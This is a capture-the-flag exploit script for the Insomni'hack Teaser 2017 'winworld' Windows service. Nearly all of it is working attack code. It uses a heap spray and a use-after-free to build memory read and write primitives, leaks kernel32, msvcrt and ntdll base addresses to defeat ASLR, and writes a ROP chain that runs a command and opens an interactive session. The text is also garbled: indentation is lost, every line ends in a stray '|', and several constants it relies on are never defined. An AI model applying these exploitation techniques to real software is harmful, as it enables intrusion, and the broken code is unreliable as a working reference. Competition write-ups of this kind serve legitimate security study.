# Insomni'hack Teaser 2017 "winworld" task exploit |
# |
# Author: Mateusz "j00ru" Jurczyk |
# Date: 21 January 2017 |
# |
import os |
import random |
import string |
import sys |
import struct |
import subprocess |
import socket |
import telnetlib |
import time |
#host = "localhost" |
host = "winworld.teaser.insomnihack.ch" |
port = 1337 |
def read_until(s, text): |
buffer = "" |
while len(buffer) < len(text): |
buffer += s.recv(1) |
while buffer[-len(text):] != text: |
buffer += s.recv(1) |
return buffer[:-len(text)] |
def dd(x): |
return struct.pack("<I", x) |
def dq(x): |
return struct.pack("<Q", x) |
########################################################################## |
# Exploit start |
########################################################################## |
def wait_narrator(s): |
read_until(s, "[day ") |
def new(s, type, sex, name): |
wait_narrator(s) |
s.sendall("new %s %s %s\n" % (type, sex, name)) |
def clone(s, person_id, new_name): |
wait_narrator(s) |
s.sendall("clone %s %s\n" % (person_id, new_name)) |
def list(s, type): |
wait_narrator(s) |
s.sendall("list %s\n" % type) |
persons = [] |
read_until(s, "List of all %s\r\n" % type) |
while True: |
line = s.recv(4) |
if line == "narr": |
break |
person = {} |
person["id"] = read_until(s, " ") |
read_until(s, "'") |
person["name"] = read_until(s, "'") |
read_until(s, "alive at (") |
person["x"] = int(read_until(s, ", ")) |
person["y"] = int(read_until(s, "))")) |
read_until(s, "\n") |
persons.append(person) |
return persons |
def info(s, person_id): |
wait_narrator(s) |
s.sendall("info %s\n" % person_id) |
person = {} |
read_until(s, "Name: ") |
person["name"] = read_until(s, "\r\n") |
read_until(s, "Type: ") |
person["sex"] = read_until(s, " ") |
person["type"] = read_until(s, "\r\n") |
read_until(s, "Position: (") |
person["x"] = int(read_until(s, ", ")) |
person["y"] = int(read_until(s, ")")) |
read_until(s, "Stats: attack ") |
person["attack"] = int(read_until(s, ", health ")) |
person["health"] = int(read_until(s, "/")) |
person["max_health"] = int(read_until(s, ", luck ")) |
person["luck"] = int(read_until(s, "\r\n")) |
read_until(s, "Sexual affinity:") |
person["sex_affinity"] = read_until(s, "\r\n").strip() |
read_until(s, "Alive: ") |
person["alive"] = read_until(s, "\r\n") == "yes" |
if person["type"] == "host": |
read_until(s, "Dead ") |
person["times_dead"] = int(read_until(s, " times in ")) |
else: |
read_until(s, "Has been here for ") |
person["days"] = int(read_until(s, " days and did ")) |
person["moves"] = int(read_until(s, " moves.")) |
read_until(s, "On encounter: ") |
person["encounter"] = read_until(s, "\r\n") |
person["friends"] = [] |
read_until(s, "Friends:") |
data = s.recv(2) |
if data != " n": |
while True: |
data = s.recv(4) |
if data != " - ": |
break |
friend = {} |
friend["name"] = read_until(s, " (") |
friend["type"] = read_until(s, ", ") |
friend["alive"] = read_until(s, ")\r\n") == "alive" |
person["friends"].append(friend) |
person["sentences"] = [] |
read_until(s, "sentences:") |
data = s.recv(2) |
if data != " n": |
while True: |
data = s.recv(4) |
if data != " - ": |
break |
person["sentences"].append(read_until(s, "\r\n")) |
return person |
def update(s, person_id, attribute, value): |
wait_narrator(s) |
s.sendall("update %s %s %s\n" % (person_id, attribute, value)) |
def friend(s, action, person1, person2): |
wait_narrator(s) |
s.sendall("friend %s %s %s\n" % (action, person1, person2)) |
def sentence(s, action, person_id, value): |
wait_narrator(s) |
s.sendall("sentence %s %s %s\n" % (action, person_id, value)) |
def get_map(s): |
wait_narrator(s) |
s.sendall("map\n") |
def move(s, person_id, path): |
wait_narrator(s) |
s.sendall("move %s %s\n" % (person_id, path)) |
def random_move(s): |
wait_narrator(s) |
s.sendall("random_move\n") |
def next_day(s): |
wait_narrator(s) |
s.sendall("next_day\n") |
def find_path(src, dest, game_map): |
q = [(src["x"], src["y"])] |
prev = {} |
visited = {} |
while len(q) > 0: |
x = q[0][0] |
y = q[0][1] |
q = q[1:] |
# Check if we arrived at the destination. |
if (x == dest["x"]) and (y == dest["y"]): |
# If so, reverse the prev chain to create a path. |
path = "" |
while (x != src["x"]) or (y != src["y"]): |
cur_prev = prev[(x, y)] |
path = ["u", "r", "d", "l"][cur_prev] + path |
vx = [1, 0, -1, 0] |
vy = [0, -1, 0, 1] |
x += vx[cur_prev] |
y += vy[cur_prev] |
return path |
vx = [-1, 0, 1, 0] |
vy = [0, 1, 0, -1] |
for v in xrange(4): |
new_pos = (x + vx[v], y + vy[v]) |
if (new_pos[0] >= 0) and (new_pos[0] < 60) and (new_pos[1] >= 0) and (new_pos[1] < 150) and (game_map[new_pos]) and (new_pos not in visited): |
q.append(new_pos) |
visited[new_pos] = True |
prev[new_pos] = v |
return None |
def read_mem(s, address, size, uaf_id, control_id): |
update(s, control_id, "name", "\x00" * 0x38 + dq(address) + dq(1) + dq(size) + dq(0xffffffffffffffff) + "\x00" * 0xA + "\x01" + "\x00" * 0x25) |
ret = info(s, uaf_id) |
return ret["name"] |
def write_mem(s, address, data, uaf_id, control_id): |
update(s, control_id, "name", "\x00" * 0x38 + dq(address) + dq(1) + dq(0xffffffffffffffff) + dq(0xffffffffffffffff) + "\x00" * 0xA + "\x01" + "\x00" * 0x25) |
update(s, uaf_id, "name", data) |
def call_rip(s, address, uaf_id, control_id): |
control_id_info = info(s, control_id) |
update(s, control_id, "name", dq(address) + "\x00" * 0x58 + "\x01\x01\x01" + "\x00" * 0xd + dd(control_id_info["x"] - 1) + dd(control_id_info["y"]) + "\x00" * 0x10) |
move(s, uaf_id, "d") |
# Connect to service. |
s = socket.socket() |
s.connect((host, port)) |
read_until(s, "park no ") |
rand_val = int(read_until(s, " ]--")) |
print "[+] Random value: %d" % rand_val |
# Get maze center. |
proc = subprocess.Popen(['calc_rand.exe', str(rand_val)],stdout=subprocess.PIPE) |
for line in proc.stdout: |
seed, center_x, center_y = map(lambda x: int(x), line.rstrip().split()) |
print "[+] Calculated seed: %x" % seed |
# Attach debugger if necessary. |
#raw_input("Connected.") |
# Create N sentences and immediately remove them to spray the heap memory with non-zero data. |
for i in xrange(HEAP_SPRAY_SENTENCES): |
sentence(s, "add", "h0", chr(0xff ^ i) * 0x88) |
for i in xrange(HEAP_SPRAY_SENTENCES): |
sentence(s, "remove", "h0", chr(0xff ^ i) * 0x88) |
# Create worker h7, a clone of h0, but hopefully with the can_find_center bit set. |
clone(s, "h0", "h7") |
# Make h7 very weak, so it can be killed easily. |
update(s, "h7", "health", "1") |
# Make g1 strong and aggressive. |
update(s, "g1", "attack", "10") |
update(s, "g1", "encounter", "attack") |
# Make h7 friends with all other existing hosts (h0-h6). Also remove existing friend g1. |
friend(s, "remove", "h7", "g1") |
for i in xrange(7): |
friend(s, "add", "h7", "h%d" % i) |
# Set the actions of g0 and h7 to "talk" (friendly). |
update(s, "g0", "encounter", "talk") |
update(s, "h7", "encounter", "talk") |
# Get the map layout. |
game_map = {} |
get_map(s) |
read_until(s, "+\r\n") |
for x in xrange(60): |
s.recv(1) |
for y in xrange(150): |
pt = s.recv(1) |
if pt == ' ': |
game_map[x, y] = True |
else: |
game_map[x, y] = False |
s.recv(3) |
# Do the same for g0: find the path to the maze center and go there. |
g0_info = info(s, "g0") |
print "g0: (%d, %d), center: (%d, %d)" % (g0_info["x"], g0_info["y"], center_x, center_y) |
g0_path = find_path({"x": g0_info["x"], "y": g0_info["y"]}, {"x": center_x, "y": center_y}, game_map) |
if g0_path == None: |
print "[-] Unfortunately there is no path from g0 to the maze path, please retry." |
sys.exit(1) |
print "path: %s (len %d)" % (g0_path, len(g0_path)) |
move(s, "g0", g0_path) |
g0_info = info(s, "g0") |
print "g0: (%d, %d)" % (g0_info["x"], g0_info["y"]) |
assert((g0_info["x"] == center_x) and (g0_info["y"] == center_y)) |
# Find the path from h7 to maze center, and go there. |
h7_info = info(s, "h7") |
print "h7: (%d, %d), center: (%d, %d)" % (h7_info["x"], h7_info["y"], center_x, center_y) |
h7_path = find_path({"x": h7_info["x"], "y": h7_info["y"]}, {"x": center_x, "y": center_y}, game_map) |
if h7_path == None: |
print "[-] Unfortunately there is no path from h7 to the maze path, please retry." |
sys.exit(1) |
print "path: %s (len %d)" % (h7_path, len(h7_path)) |
#raw_input("About to move h7 to transform into guest (g3)...") |
move(s, "h7", h7_path) |
# Find the path from g1 to h7 (maze center), and go there. |
g1_info = info(s, "g1") |
print "g1: (%d, %d), center: (%d, %d)" % (g1_info["x"], g1_info["y"], center_x, center_y) |
g1_path = find_path({"x": g1_info["x"], "y": g1_info["y"]}, {"x": center_x, "y": center_y}, game_map) |
if g1_path == None: |
print "[-] Unfortunately there is no path from g1 to the maze path, please retry." |
sys.exit(1) |
print "path: %s (len %d)" % (g1_path, len(g1_path)) |
#raw_input("About to move g1 to kill h7...") |
move(s, "g1", g1_path) |
# Remove all of h7's friends so that they don't cause us trouble later on. |
for i in xrange(7): |
friend(s, "remove", "g3", "h%d" % i) |
# Create some persons which will be used in a second to spray the heap. |
for i in xrange(HEAP_SPRAY_PERSONS): |
new(s, "guest", "male", "A") |
# Move to next day, which will result in freeing g3, to which a dangling reference will persist as h7. |
next_day(s) |
for i in xrange(HEAP_SPRAY_PERSONS): |
update(s, "g%d" % (4 + i), "name", "A" * 0x88) |
# Update "encounter" for h7, which will result in saving a valid function pointer into one of the sentences. |
update(s, "h7", "encounter", "attack") |
# Print guest names: one of them should contain the leaked address. |
guests = list(s, "guests") |
for i in xrange(4, 4 + HEAP_SPRAY_PERSONS - 1): |
if guests[i]["name"][:8] != "A" * 8: |
ATTACK_FUNC_ADDR = struct.unpack("<Q", guests[i]["name"][:8])[0] |
print "[+] Found controlled structure in the name of guest %d" % i |
print "[+] Leaked address: %x" % ATTACK_FUNC_ADDR |
assert(CONTROL_IDX != None) |
uaf_id = "h7" |
control_id = "g%d" % CONTROL_IDX |
# Create helper person h8, which will be used to get the address of 7. |
new(s, "host", "male", "h8") |
# Set h7 to completely empty. |
update(s, control_id, "name", "\x00" * 0x62 + "\x01" + "\x00" * 0x25) |
# Connect h7 and h8 as friends. |
friend(s, "add", "h7", "h8") |
# Read the address of the friends vector in h7. |
friends_vector_start = struct.unpack("<Q", info(s, control_id)["name"][8: 16])[0] |
print "[+] Friends vector start: %x" % friends_vector_start |
h8_address = struct.unpack("<Q", read_mem(s, friends_vector_start, 8, uaf_id, control_id))[0] |
print "[+] h8 address: %x" % h8_address |
h8_friends_vector_start = struct.unpack("<Q", read_mem(s, h8_address + 8, 8, uaf_id, control_id))[0] |
print "[+] h8 friends vector start: %x" % h8_friends_vector_start |
h7_address = struct.unpack("<Q", read_mem(s, h8_friends_vector_start, 8, uaf_id, control_id))[0] |
print "[+] h7 address: %x" % h7_address |
RtlCaptureContext = struct.unpack("<Q", read_mem(s, WINWORLD_BASE_ADDR + 0x16080, 8, uaf_id, control_id))[0] |
KERNEL32_BASE = RtlCaptureContext - 0x23F30 |
print "[+] RtlCaptureContext: %x" % RtlCaptureContext |
print "[+] Kernel32 base: %x" % KERNEL32_BASE |
srand = struct.unpack("<Q", read_mem(s, WINWORLD_BASE_ADDR + 0x164B0, 8, uaf_id, control_id))[0] |
MSVCRT_BASE = srand - 0x1C350 |
print "[+] srand: %x" % RtlCaptureContext |
print "[+] MSVCRT base: %x" % MSVCRT_BASE |
RtlDecodeSystemPointer = struct.unpack("<Q", read_mem(s, KERNEL32_BASE + 0x75A90, 8, uaf_id, control_id))[0] |
NTDLL_BASE = RtlDecodeSystemPointer - 0x86DC0 |
print "[+] RtlDecodeSystemPointer: %x" % RtlDecodeSystemPointer |
print "[+] NTDLL base: %x" % NTDLL_BASE |
#raw_input("Going to call a controlled pointer...") |
call_rip(s, RtlCaptureContext, uaf_id, control_id) |
stack_address = struct.unpack("<Q", read_mem(s, h7_address + 0x98, 8, uaf_id, control_id))[0] |
print "[+] Leaked stack address: %x" % stack_address |
#raw_input("Writing ROP and jumping there...") |
write_mem(s, KERNEL32_BASE + 0xA2150, "type flag.txt flag.txt flag.txt\0", uaf_id, control_id) |
rop = (dq(KERNEL32_BASE + 0x698EB) + dq(KERNEL32_BASE + 0xA2150) + dq(MSVCRT_BASE + 0xA4BAC)) |
#write_mem(s, 0x12345678, rop, uaf_id, control_id) |
write_mem(s, stack_address + 0x178, rop, uaf_id, control_id) |
while True: |
sys.stdout.write(s.recv(16)) |
t = telnetlib.Telnet() |
t.sock = s |
t.interact() |